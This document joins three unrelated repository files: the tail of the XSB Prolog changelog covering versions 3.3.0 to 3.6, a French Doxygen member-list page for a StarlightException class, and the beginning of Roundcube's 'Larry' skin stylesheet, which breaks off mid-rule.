<li> Minor improvements to forest logging including stream flushing
and better designation of incomplete tables closed due to a
throw.</li>
<li> Structures for tabled subgoals now require less space.</li>
<li> Handling has been improved for terms of the form functor() by
system predicates.</li>
</ul>
</ul>
<h2> Version 3.6 (Gazpatcho)</h2>
<ul>
<li><b> Enhancements </b></li>
<ul>
<li>
A number of changes have been made to make XSB more ISO-compliant.
<ul>
<li> Error balls thrown by XSB are now of the ISO-compliant
form <tt>error/2</tt> rather than <tt>error/3</tt> as previously.</li>
<li> The action of <tt>write/1</tt> has been fixed so various
operators are now displayed in a more ISO-compliant manner. Reading
and writing escape characters is also more ISO-compliant now.</li>
<li> The conditions under which arithmetic errors are thrown and the
types of errors that are thrown are now much more ISO-compliant.
Similar changes were made to errors thrown by file handling,
I/O-related predicates and other classes of predicates.</li>
<li>When possible, XSB's table error balls now represent the actual
goal that caused the error, rather than simply the functor and arity
of the goal. </li>
</ul>
</li>
<li>
A number of improvements have been made to incremental tabling, with
the result that lazy incremental tabling is now the only incremental
tabling strategy supported in XSB. Lazy incremental tabling fully
replaces eager incremental tabling, as the lazy version is both more
robust and more efficient. In addition
<ul>
<li>A new predicate <tt>abolish_nonincremental_tables/0</tt> safely
abolishes all non-incremental tables, even when incremental and
non-incremental tables may depend on one another. </li>
<li> Other new predicates have been added to allow introspection data
structures and state related to incremental tabling.
<tt>incr_is_invalid/1</tt> allows inspection of the state of an
incremental subgoal, and <tt>incr_invalid_subgoals/1</tt> returns a
list of incrementally tabled subgoals that are currently invalid. A
new option for <tt>statistics/2</tt> returns the number of subgoals
and dependency edges in the incremental dependency graph.</li>
</ul>
</li>
<li>An addition has been made to forest logging to allow logging to be
turned off on a per-predicate basis.</li>
<li>The predicate <tt>copy_term_nat/2</tt> has been added, which acts
as <tt>copy_term/2</tt> except that it does not copy the attributes of
variables. (This predicate acts as a similar predicate in SWI Prolog.)
</li>
<li>The library <tt>storage.P</tt> is now based on lazy incremental
tabling</li>
</ul>
<li><b> Bug fixes and minor changes </b></li>
<ul>
<li>Numerous bugs were fixed for table abolishes, particularly for the
following. Table garbage collection, which sometimes core dumped when
reclaiming space, has been made more robust. Transitive table
abolishes have also been made much more robust.
</li>
<li>Numerous obscure bugs were fixed in incremental tabling,
particularly when incremental tabling is used with table abolishes
(and when exceptions are thrown over incremental tabling).
Incremental tabling was also made more efficient in certain
cases. <tt>abolish_all_tables/0</tt> now properly reclaims all
incremental tabling data structures. Table garbage collection also
now properly reclaims incremental table space.</li>
<li>The predicate <tt>term_variables/2</tt> is now implemented in C.
<li>Two new predicates have been
added, <tt>abolish_table_subgoals/[1,2]</tt>
and <tt>abolish_table_subgoal/[1,2]</tt>, which differ in whether they
abolish all tabled subgoals that unify with an input term, or only
abolish a tabled subgoal that is a variant of the input
term. <tt>abolish_table_subgoals/[1,2]</tt> acts in exactly the same
manner as <tt>abolish_table_call/[1,2]</tt>, but is the preferred
name.
</ul>
</ul>
<h2> Version 3.5 (Maotai)</h2>
<h3> Version 3.5</h3>
<ul>
<li><b> Enhancements </b></li>
<ul>
<li> XSB's character-level I/O has been significantly rewritten and
expanded. It now supports as encodings UTF-8, CP-1252, and LATIN-1;
with UTF-8 as the default encoding on UNIX-style systems, and CP-1252
as the default encoding on Windows systems. Various ISO predicates
regarding encodings are also supported such
as <tt>character_set/1</tt>. Finally, other character-based I/O
predicates such as <tt>get_XXX</tt>, <tt>peek_XXX</tt>,
and <tt>put_XXX</tt> have been thoroughly rewritten and should be both
ISO-compliant and more efficient.
<li> XSB now has an alternative means of tabling ground structures
called "hash-consing" or "interning". This feature can greatly
improve performance when tabling is used for structural
recursion.</li>
<li> XSB now cleanly compiles under the latest version of Mac OS X
which uses LLVM's clang compiler.</li>
<li> XSB's incremental tabling now fully supports view consistency for
tables that have been updated. Incremental tabling has also been
extended to allow abstraction of dynamic predicates in the call graph.
Finally, a number of bugs in incremental tabling have been fixed.</li>
<li>XSB's compiler has been extended so that XSB can be used as a
preprocessor extending GPP</li>
<li>Various predicates have been added: a platform-independent
built-in predicate <tt>epoch_seconds/1</tt>,
and <tt>module_of_term/2.</tt> XSB's <tt>concat_atom/2</tt>, a
generalization of the ISO <tt>atom_concat/2</tt> now also can be used
to split atoms.</li>
<li>A new library, <tt>prolog_db</tt> supports efficient meta-programming.</li>
<li> Radial restraint is now available when XSB is embedded into a process.</li>
</ul>
<li><b> Bug fixes </b></li>
<ul>
<li> XSB now handles file paths that include spaces on Unix.</li>
<li> Various fixes have made answer subsumption more robust.</li>
<li> <tt>thread_sleep/1</tt> now accepts seconds as per draft
standardization proposal. The <tt>at_exit/1</tt> thread handler has
been changed so that its success, failure, or error doesn't affect the
thread exit status. Finally, a bug in handling exceptions resulting from
thread cancellation using a <tt>throw/1</tt> signal has been fixed.</li>
<li> Made XSB's use of gpp safe for cyclic <tt>#include</tt> statements.</li>
<li> Various fixes for Prolog-based conditional compilation.</li>
<li> Better indexing when loading forest logs. A new
option, <i>partial logging</i> is now also supported.</li>
<li> <tt>format/[2,3]</tt> changed to better handle escaped characters.</li>
</ul>
</ul>
<h2> Version 3.4 (Soy mILK)</h2>
<h3> Version 3.4</h3>
<ul>
<li><b> Enhancements </b></li>
<ul>
<li> A new approach to bounded rationality within tabling,
termed <i>radial restraint</i>, can be used to ensure sound (with
respect to the well-founded semantics) termination of programs even
when they contain function symbols and have infinite models. Radial
restraint works by abstracting answers that exceed a given depth and
making the truth value for these answers <i>undefined</i>, and can be
declared on a per-predicate basis. </li>
<li>A new builtin, <tt>u_not/1</tt> assigns the
truth-value <i>undefined</i> to non-ground negative subgoals, rather
than throwing an exception. In various other cases, such as with
arithmetic computation errors, a goal can optionally be set
to <i>undefined</i> rather than throwing an exception.
</li>
<li> New builtins support better inspection of the state of tables,
even while these tables are being computed.
<ul><li> <tt>get_incr_sccs_with_deps/[2,3]</tt> produces a Prolog
representation of the dependency graph of incrementally tabled
subgoals, including strongly connected components information and
dependencies among these components. </li>
<li>A similar predicate, <tt>get_residual_sccs/[3,5]</tt> provides an
analogous view of atoms of the residual program whose truth value
is <i>undefined</i> under the well-founded semantics. In addition,
the predicate <tt>explain_u_val/2</tt> can be used to explain why an
atom is undefined: because of negative loops, radial restraint, or
some other reason.
</li></li></ul>
<li>Subgoal abstraction is now supported on a per-predicate basis. </li>
<li>Added ISO predicate <tt>halt/1</tt></li>
<li>XSB's ODBC interface now has a predicate to return all available drivers.</li>
</ul>
<li><b> Bug fixes </b></li>
<ul>
<li> A bug was fixed that prevented XSB from properly initializing
when configured with a long path name under Windows. XSB also
requires less space to start up under Windows than it did
previously.</li>
<li> Various fixes for bugs that occurred when copying into or out of
a table either large answers, or answers with a large number of
variables, or answers with large delay lists.</li>
<li> Various bugs involving attributed variables were fixed: when
delaying the evaluation of tabled predicates via the <i>when</i>
library, and in certain cases where attributed variables occurred in
dynamic code. Finally, listing now prints out attributed variables
correctly. </li>
<li> Various bugs were fixed that occurred in error handling during
heavily tabled computations, such as when throwing a "maximum subgoal
depth exceeded" exception on very large subgoals, or when throwing
over incomplete incrementally tabled subgoals. Also error handling was
improved when a term to be interned exceeds a maximal user-defined
depth.</li>
<li> Various small bugs were fixed for forest logging. Forest logging
now can print much larger terms than previously, and prints error
terms more concisely. </li>
<li> Several small bugs were fixed for answer subsumption.</li>
<li> XSB's tracing now uses <tt>writeq/2</tt> for easier copy and paste while
tracing; also, a bug was . fixed when consult (<tt>[]/2</tt>) is
called within XSB's tracing. </li>
<li> Bugs were fixed in <tt>abolish/1</tt>
in <tt>atom_chars/2</tt>, <tt>atom_codes/2</tt> and
in <tt>load_dyn/[1,2]</tt> </li>
</ul>
<h3> Version 3.3.7</h3>
<ul>
<li><b> Enhancements </b></li>
<ul>
<li>The incremental tabling subsystem have been improved in various
ways. The subsystem now fully supports handling of conditional
answers (i.e., answers that are undefined in WFS). Updates of
incremental tables can now be done lazily whenever a tabled subgoal is
re-called: an explicit call to a table update routine is no longer
necessary. In addition, the XSB API has been restructured to be more
consistent, and several of the API routines have been moved into
C.</li>
<li> XSB's profiler now supports detection of calls that do not
properly use a predicate's indexing.</li>
<li> XSB's forest logging now profiles tabled negation, including
delaying and simplification. In addition, several new routines have
been implemented that provide in-depth analysis of the logs.
<li>A new XSB flag allows information about incomplete tabled subgoals
and their SCCs to be written to a file upon throwing an exception,
which can aid in debugging.</li>
<li> Several new built-ins have been added.
<ul>
<li> <tt>ground_and_acyclic/1</tt> is now available.
<li> <tt>check_variant/1</tt> can efficiently check whether the
variant of a goal exists in trie-indexed dynamic predicates.
<li> <tt>find_n/4</tt> acts as <tt>findall/3</tt> but returns only the
first <i>n</i> solutions to a goal.
</ul>
<li> XSB's <tt>table_dump</tt> library now distinguishes between
answers whose truth value is "true" and those whose truth value is
"undefined".
<li>Error handling routines have been improved, especially when
printing out cyclic or large terms.</li>
<li>XSB's configuration now supports compilation with cilk.
</ul>
<li><b> Bug fixes </b></li>
<ul>
<li> On Windows, XSB is automatically configured so that Windows
allocates a larger default call stack, removing a class of
Windows-specific errors.</li>
<li>
A number of bugs have been fixed that together make XSB more robust
for very large and heavily tabled computations. Among these, XSB
better manages when an exception is thrown over the point of creation
of an incomplete table: previously this could cause a core dump under
certain situations, while now all such situations are detected and
handled properly. </li>
<li>XSB handles updates to an incremental table that has active choice
points without core-dumping, as it sometimes did in previous
versions. </li>
<li> <tt>call_cleanup/3</tt> is now properly called when an
exception is thrown over a goal to be cleaned up, or when early
completing a tabled subgoal. </li>
<li>Bugs in cyclic term handling that were present on 32-bit Linux are
now fixed.</li>
<li> Other bug fixes include the following. There were various fixes
to small bugs in answer subsumption, particularly relating to
compilation. A fix was made to tabled negation when all conditional
answers to a goal have been removed by simplification. Handling of
floats by <tt>number_codes/chars</tt> was improved. A bug
in <tt>get_residual</tt> was fixed, which arose when displaying a
conditional answer with a large number of variables in its delay list.
Finally, a number of small bugs in handling large (boxed) integers have
been fixed.</li>
</ul>
</ul>
<h3> Version 3.3.6</h3>
<ul>
<li><b>New features</b></li>
<ul>
<li> Call Abstraction is now fully implemented for fixed-order
stratified programs. The use of call abstraction can ensure
termination for <i>all</i> programs with finite models.</li>
<li> A new flag <tt>unify_with_occurs_check</tt> can be set so that
XSB's core engine performs full unification for all resolution
operations (including tabling).
<li> A new predicate, <tt>timed_call/3</tt>, allows a goal to be
executed and repeatedly interrupted every <i>n</i> milliseconds with a
handler. During a long computation <tt>timed_call/3</tt> can be used
to repeatedly report on the system state, to dynamically alter
heuristics, or to enforce resource limits (a more specialized
predicate, <tt>bounded_call/[3,4]</tt> is also available.)
</li>
<li> New predicates and evaluable functions have been added to support
the draft ISO core revision including <tt>^/2</tt>,<tt>div/2</tt>,
<tt>xor/2</tt>, <tt>acyclic_term/1</tt>
and <tt>subsumes_term/2</tt>. (XSB already had most, but not all, of
these predicates and functions under non-ISO names.)</li>
<li> Another new flag can be used to limit XSB's memory consumption to
a preset amount. Using an internally set memory limit, rather than
the system memory limit, can be important when XSB is used with Java
through InterProlog or is embedded into a C or Java program.
<li> Various other new predicates have been added to
XSB. <tt>print_incomplete_tables/[0,1]</tt> can be used to aid
debugging. <tt>term_size/2</tt> and <tt>term_size_limit/2</tt>
efficiently determine the size of a term.. The various forms of
the <tt>table_dump</tt> predicate now display the number of calls to a
tabled subgoal along with SCC information for non-completed
subgoals.</li>
</ul>
<li><b> Important bug fixes and enhancements </b></li>
<ul>
<li> Fixed issue where XSB was not being configured correctly for Linux kernels 3.*
</li>
<li> XSB now performs unification of cyclic terms. In addition, <tt>
tnot/1</tt>, <tt>sk_not/1</tt>, <tt>
abolish_table_call/1</tt>, <tt>atom_chars/2</tt>,
and <tt>atom_codes/2</tt> are now cycle safe. The
predicate <tt>ground_or_cyclic/1</tt> provides a cycle-safe groundness
check.
</li>
<li> Improved compilation time for files with very large numbers of
predicates. Improved performance times
for <tt>tnot/1</tt>, <tt>is_<a>cyclic/1</tt>,
and <tt>subsumes_term/2</tt>.
</li>
<li> Added optional depth check for interned tries. Improved
robustness of exception handling for depth-checks in tables and tries
and for memory-overflow exceptions. Made exception handling for
several ISO predicates more consistent with ISO specifications.
<li> Profiling is now enabled for 64-bit Windows.
</ul>
</ul>
<h3> Version 3.3.5</h3>
<ul>
<li> The port of XSB to 64-bit Windows has been hardened so that XSB
can call external C functions, and its configuration process has been
improved.
</li>
<li> The initial version of a new tracing facility for computations,
called <i>forest logging</i> is now available for use.
</li>
<li> A new predicate, called <tt>table_dump/[1,2,3]</tt> allows easy
introspection of XSB's tables. In addition, new builtins
<tt>is_cyclic/1</tt> and <tt>term_depth/2</tt> are now available.
</li>
<li> Configuration of the latest version of XSB on the latest version
of Cygwin is now working again.
</li>
<li> Numerous bug fixes and specialized enhancements, the most
widespread of which were: Improving the module inferencing used by
XSB's compiler; improving XSB's exception handling when large
computations use all available memory; improved messages for term
depth exceptions; improved compilation times for files/modules with
a large number of predicates.
</li>
</ul>
<h3> Version 3.3.4</h3>
<ul>
<li> XSB now includes a Java-based installer for Windows 32- and
64-bits, and for several varieties of Linux.
</li>
<li> XSB now allows a compiler option indicating that the input file is
canonical, which can improve the speed of compilation of files in
canonical form by 10-20\%.
</li>
<li> New flags allow users to automatically fail, warn, or throw an
error whenever trying to add to a table an answer whose depth is above
a given threshold. Separate flags are provided for lists and non-lists.
</li>
<li> Garbage collection time for abolishing tables is now maintained
for statistics.</li>
<li> <tt>load_dyn/[1,2]</tt> can now dynamically load a file into a
module.</li>
<li> Several bug fixes, including the following. An obscure bug in
handling unsafe variables. A bug that sometimes occurred when adding
conditional answers with answers in the head but not in the delay
lists. Arrays used in interning an answer or trie term with a very
large number of variables, are now expanded when necessary. </li>
<li> Minor changes were made to make errors that have to do with
tabling show the actual call that generated the error, rather than
just the predicate.</li>
</li>
</ul>
<h3> Version 3.3.3</h3>
<ul>
<li>
XSB is now supported on 64-bit Windows platform, either in 64-bit or
in 32-bit mode under MSVC compilation. Similar support has been
available for Linux and Mac OS X for several years. During the
porting process to Windows, several small bugs were fixed for all
64-bit platforms.
</li>
<li>
A new table inspection
predicate <tt>variant_get_residual(Call,DelayList)</tt> can be used to
return (possibly conditional) answers for a table that is a variant
of <tt>Call</tt>
</li>
<li>
Prolog commons libraries are now included with the distribution.
</li>
</ul>
<h3> Version 3.3.2</h3>
<ul>
<li>
XSB and its packages are now significantly easier to compile on
Windows using the MSVC compiler.
</li>
<li>
Fix to allow XSB to be compiled on the Mac with very recent changes to
Apple's xcode. These xcode changes broke backwards compatibility!
</li>
<li> Fix for recently introduced bug that broke XSB embedability into
C programs on Linux. In addition a fix allows XSB to exit cleanly in
32-bit Linux when tagged address space has been exceeded.
</li>
<li>
<tt> url_encode/2 </tt> and <tt> url_decode/2</tt> are now standard predicates.
</li>
<li>A queryable trace log facility is now available do aid debugging.
<li>
Minor bug fixes and enhancements:
<ul>
<li>Fixed core dump that arose from poor error handling when
univ was called using a list whose length was greater
than <tt>MAX_ARITY.</tt>
</li>
<li>
Simplification stack is now dynamically expandable (this should only
affect programs that make extremely heavy use of well-founded
negation).
</li>
<li><tt>pretty_print/2</tt> now implemented to pretty print to a stream.</li>
</li>
<li>
XSB now treats <tt>0'\s</tt> as a space to improve compatibility with
some other Prologs.
</li>
<li>
Patch level added into the Prolog commons flag <tt> version_data</tt>;
patch date is now a part of the XSB banner.
</li>
</ul>
</ul>
<h3> Version 3.3.1</h3>
<ul>
<li>
Bug fixes for incremental tabling that arose when explicitly
abolishing invalidated incremental tables. Inclusion of information
about incremental tables in statistics when relevant.
</li>
</ul>
<h3> Version 3.3.0</h3>
<ul>
<li>
Bug fixe for incremental tabling when evaluating programs with tabled
negation.
</li>
<li>
Fix for bug under 32-bit Linuxes when allocating very large chunks of
memory.
</li>
<li>
Inclusion of number of SCCs of non-completed tabled subgoals into
XSB's statistics.
</li>
<li>
Fix in proc_files library for loading csv files into Prolog predicates.
</li>
<li>
Fixes for various bugs when using CLP(R) with tabling. Update of
CLP(R) package to include newest changes from SWI repository. Changes
to CLP(R) package to allow a smaller, and user-defined epsilon.
</li>
<li>
Changes to attribute API to make this XSB's API similar to that of SWI
and YAP (and perhaps others). Made term_variables/2 standard as it is
in other Prologs.
</li>
</ul>
<hr>
<address>Email: <a href="mailto:xsb-users@lists.sourceforge.net" >xsb-users@lists.sourceforge.net</a></address>
<!-- hhmts start -->Last modified: $Id: changelog.html,v 1.13 2013-05-02 20:29:45 tswift Exp $ <!-- hhmts end -->
</body> </html>
|
documentation/html/da/dba/classStarlightException-members.html | splacentino/Starlight | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.9.1"/>
<title>Starlight: Liste des membres</title>
<link href="../../tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="../../jquery.js"></script>
<script type="text/javascript" src="../../dynsections.js"></script>
<link href="../../search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="../../search/searchdata.js"></script>
<script type="text/javascript" src="../../search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { init_search(); });
</script>
<link href="../../customdoxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">Starlight
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Généré par Doxygen 1.8.9.1 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "../../search",false,'Recherche');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="../../index.html"><span>Page principale</span></a></li>
<li><a href="../../namespaces.html"><span>Espaces de nommage</span></a></li>
<li class="current"><a href="../../annotated.html"><span>Classes</span></a></li>
<li><a href="../../files.html"><span>Fichiers</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="../../search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Recherche" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="../../search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="../../annotated.html"><span>Liste des classes</span></a></li>
<li><a href="../../classes.html"><span>Index des classes</span></a></li>
<li><a href="../../inherits.html"><span>Hiérarchie des classes</span></a></li>
<li><a href="../../functions.html"><span>Membres de classe</span></a></li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
</div><!-- top -->
<div class="header">
<div class="headertitle">
<div class="title">StarlightException Liste des membres</div> </div>
</div><!--header-->
<div class="contents">
<p>Liste complète des membres de <a class="el" href="../../d4/d35/classStarlightException.html">StarlightException</a>, y compris les membres hérités :</p>
<table class="directory">
<tr class="even"><td class="entry"><a class="el" href="../../d4/d35/classStarlightException.html#aa235f0c10c5ad918b0c2911c72a85fcb">errorMsg</a></td><td class="entry"><a class="el" href="../../d4/d35/classStarlightException.html">StarlightException</a></td><td class="entry"><span class="mlabel">private</span></td></tr>
<tr><td class="entry"><a class="el" href="../../d4/d35/classStarlightException.html#ae4c499f366c74c29dc36c935aa665dda">getMessage</a>() const </td><td class="entry"><a class="el" href="../../d4/d35/classStarlightException.html">StarlightException</a></td><td class="entry"><span class="mlabel">inline</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="../../d4/d35/classStarlightException.html#a36d43a3c21c61b15a8dc4b3e15f12ab0">StarlightException</a>(std::string)</td><td class="entry"><a class="el" href="../../d4/d35/classStarlightException.html">StarlightException</a></td><td class="entry"></td></tr>
<tr><td class="entry"><a class="el" href="../../d4/d35/classStarlightException.html#a727446aaf06aa9bc92d63ff21a37049b">what</a>() const </td><td class="entry"><a class="el" href="../../d4/d35/classStarlightException.html">StarlightException</a></td><td class="entry"><span class="mlabel">inline</span></td></tr>
</table></div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Généré le Vendredi 24 Avril 2015 23:43:23 pour Starlight par  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="../../doxygen.png" alt="doxygen"/>
</a> 1.8.9.1
</small></address>
</body>
</html>
|
skins/larry/styles.css | drpdigital/roundcube | /**
* Roundcube webmail styles for skin "Larry"
*
* Copyright (c) 2012, The Roundcube Dev Team
* Screendesign by FLINT / Büro für Gestaltung, bueroflint.com
*
* The contents are subject to the Creative Commons Attribution-ShareAlike
* License. It is allowed to copy, distribute, transmit and to adapt the work
* by keeping credits to the original autors in the README file.
* See http://creativecommons.org/licenses/by-sa/3.0/ for details.
*/
body {
font-family: "Lucida Grande", Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
color: #333;
background: url(images/linen.jpg) repeat #d1d5d8;
margin: 0;
}
body.noscroll {
/* also avoids bounce effect in Chrome and Safari */
overflow: hidden;
}
a {
color: #0069a6;
}
a:visited {
color: #0186ba;
}
img {
border: 0;
}
input[type="text"],
input[type="password"],
textarea {
margin: 0; /* Safari by default adds a margin */
padding: 4px;
border: 1px solid #b2b2b2;
border-radius: 4px;
box-shadow: inset 0 0 2px 1px rgba(0,0,0, 0.1);
-moz-box-shadow: inset 0 0 2px 1px rgba(0,0,0, 0.1);
-webkit-box-shadow: inset 0 0 2px 1px rgba(0,0,0, 0.1);
-o-box-shadow: inset 0 0 2px 1px rgba(0,0,0, 0.1);
}
input[type="text"]:focus,
input[type="password"]:focus,
input.button:focus,
textarea:focus {
border-color: #4787b1;
box-shadow: 0 0 5px 2px rgba(71,135,177, 0.9);
-moz-box-shadow: 0 0 5px 2px rgba(71,135,177, 0.9);
-webkit-box-shadow: 0 0 5px 2px rgba(71,135,177, 0.9);
-o-box-shadow: 0 0 5px 2px rgba(71,135,177, 0.9);
outline: none;
}
input.placeholder,
textarea.placeholder {
color: #aaa;
}
.bold {
font-weight: bold;
}
/* fixes vertical alignment of checkboxes and labels */
label input,
label span {
vertical-align: middle;
}
/*** buttons ***/
input.button {
display: inline-block;
margin: 0 2px;
padding: 2px 5px;
color: #525252;
text-shadow: 0px 1px 1px #fff;
border: 1px solid #c0c0c0;
border-radius: 4px;
background: #f7f7f7;
background: -moz-linear-gradient(top, #f9f9f9 0%, #e6e6e6 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#f9f9f9), color-stop(100%,#e6e6e6));
background: -o-linear-gradient(top, #f9f9f9 0%, #e6e6e6 100%);
background: -ms-linear-gradient(top, #f9f9f9 0%, #e6e6e6 100%);
background: linear-gradient(top, #f9f9f9 0%, #e6e6e6 100%);
box-shadow: 0 1px 1px 0 rgba(140, 140, 140, 0.3);
-o-box-shadow: 0 1px 1px 0 rgba(140, 140, 140, 0.3);
-webkit-box-shadow: 0 1px 1px 0 rgba(140, 140, 140, 0.3);
-moz-box-shadow: 0 1px 1px 0 rgba(140, 140, 140, 0.3);
text-decoration: none;
outline: none;
}
.formbuttons input.button {
color: #ddd;
font-size: 110%;
text-shadow: 0px 1px 1px #333;
padding: 4px 12px;
border-color: #465864;
border-radius: 5px;
background: #7a7b7d;
background: -moz-linear-gradient(top, #7b7b7b 0%, #606060 100%); /* FF3.6+ */
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#7b7b7b), color-stop(100%,#606060)); /* Chrome,Safari4+ */
background: -o-linear-gradient(top, #7b7b7b 0%, #606060 100%); /* Opera 11.10+ */
background: -ms-linear-gradient(top, #7b7b7b 0%, #606060 100%); /* IE10+ */
background: linear-gradient(top, #7b7b7b 0%, #606060 100%); /* W3C */
box-shadow: 0 1px 1px 0 #ccc, inset 0 1px 0 0 #888;
-o-box-shadow: 0 1px 1px 0 #ccc, inset 0 1px 0 0 #888;
-webkit-box-shadow: 0 1px 1px 0 #ccc, inset 0 1px 0 0 #888;
-moz-box-shadow: 0 1px 1px 0 #ccc, inset 0 1px 0 0 #888;
}
.formbuttons input.button:hover,
.formbuttons input.button:focus,
input.button.mainaction:hover,
input.button.mainaction:focus {
color: #f2f2f2;
border-color: #465864;
box-shadow: 0 0 5px 2px rgba(71,135,177, 0.6), inset 0 1px 0 0 #888;
-moz-box-shadow: 0 0 5px 2px rgba(71,135,177, 0.6), inset 0 1px 0 0 #888;
-webkit-box-shadow: 0 0 5px 2px rgba(71,135,177, 0.6), inset 0 1px 0 0 #888;
-o-box-shadow: 0 0 5px 2px rgba(71,135,177, 0.6), inset 0 1px 0 0 #888;
}
.formbuttons input.button:active {
color: #fff;
background: -moz-linear-gradient(top, #5c5c5c 0%, #7b7b7b 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#5c5c5c), color-stop(100%,#7b7b7b));
background: -o-linear-gradient(top, #5c5c5c 0%, #7b7b7b 100%);
background: -ms-linear-gradient(top, #5c5c5c 0%, #7b7b7b 100%);
background: linear-gradient(top, #5c5c5c 0%, #7b7b7b 100%);
}
input.button.mainaction {
color: #ededed;
text-shadow: 0px 1px 1px #333;
border-color: #1f262c;
background: #505050;
background: -moz-linear-gradient(top, #505050 0%, #2a2e31 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#505050), color-stop(100%,#2a2e31));
background: -o-linear-gradient(top, #505050 0%, #2a2e31 100%);
background: -ms-linear-gradient(top, #505050 0%, #2a2e31 100%);
background: linear-gradient(top, #505050 0%, #2a2e31 100%);
box-shadow: inset 0 1px 0 0 #777;
-moz-box-shadow: inset 0 1px 0 0 #777;
-webkit-box-shadow: inset 0 1px 0 0 #777;
-o-box-shadow: inset 0 1px 0 0 #777;
}
input.button.mainaction:active {
color: #fff;
background: #515151;
background: -moz-linear-gradient(top, #2a2e31 0%, #505050 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#2a2e31), color-stop(100%,#505050));
background: -o-linear-gradient(top, #2a2e31 0%, #505050 100%);
background: -ms-linear-gradient(top, #2a2e31 0%, #505050 100%);
background: linear-gradient(top, #2a2e31 0%, #505050 100%);
}
input.button[disabled],
input.button[disabled]:hover,
input.button.mainaction[disabled] {
color: #aaa !important;
}
input.mainaction {
font-weight: bold;
}
/** link buttons **/
a.button {
display: inline-block;
margin: 0 2px;
padding: 2px 5px;
color: #525252;
text-shadow: 0px 1px 1px #fff;
border: 1px solid #c6c6c6;
border-radius: 4px;
background: #f7f7f7;
background: -moz-linear-gradient(top, #f9f9f9 0%, #e6e6e6 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#f9f9f9), color-stop(100%,#e6e6e6));
background: -o-linear-gradient(top, #f9f9f9 0%, #e6e6e6 100%);
background: -ms-linear-gradient(top, #f9f9f9 0%, #e6e6e6 100%);
background: linear-gradient(top, #f9f9f9 0%, #e6e6e6 100%);
box-shadow: 0 1px 1px 0 rgba(140, 140, 140, 0.3);
-o-box-shadow: 0 1px 1px 0 rgba(140, 140, 140, 0.3);
-webkit-box-shadow: 0 1px 1px 0 rgba(140, 140, 140, 0.3);
-moz-box-shadow: 0 1px 1px 0 rgba(140, 140, 140, 0.3);
text-decoration: none;
}
a.button:focus,
input.button:focus {
border-color: #4fadd5;
box-shadow: 0 0 2px 1px rgba(71,135,177, 0.6);
-moz-box-shadow: 0 0 2px 1px rgba(71,135,177, 0.6);
-webkit-box-shadow: 0 0 2px 1px rgba(71,135,177, 0.6);
-o-box-shadow: 0 0 2px 1px rgba(71,135,177, 0.6);
outline: none;
}
label.disabled,
a.button.disabled {
color: #999;
}
a.button.disabled,
input.button.disabled,
input.button[disabled],
a.button.disabled:hover,
input.button.disabled:hover,
input.button[disabled]:hover {
border-color: #c6c6c6;
box-shadow: 0 1px 1px 0 rgba(160, 160, 160, 0.4);
-o-box-shadow: 0 1px 1px 0 rgba(160, 160, 160, 0.4);
-webkit-box-shadow: 0 1px 1px 0 rgba(160, 160, 160, 0.4);
-moz-box-shadow: 0 1px 1px 0 rgba(160, 160, 160, 0.4);
}
a.button.disabled span.inner {
opacity: 0.4;
filter: alpha(opacity=40);
}
a.button.pressed,
a.button:active,
input.button:active {
background: #e6e6e6;
background: -moz-linear-gradient(top, #e6e6e6 0%, #f9f9f9 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#e6e6e6), color-stop(100%,#f9f9f9));
background: -o-linear-gradient(top, #e6e6e6 0%, #f9f9f9 100%);
background: -ms-linear-gradient(top, #e6e6e6 0%, #f9f9f9 100%);
background: linear-gradient(top, #e6e6e6 0%, #f9f9f9 100%);
}
.pagenav.dark a.button {
font-weight: bold;
border-color: #e6e6e6;
background: #d8d8d8;
background: -moz-linear-gradient(top, #d8d8d8 0%, #bababa 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#d8d8d8), color-stop(100%,#bababa));
background: -o-linear-gradient(top, #d8d8d8 0%, #bababa 100%);
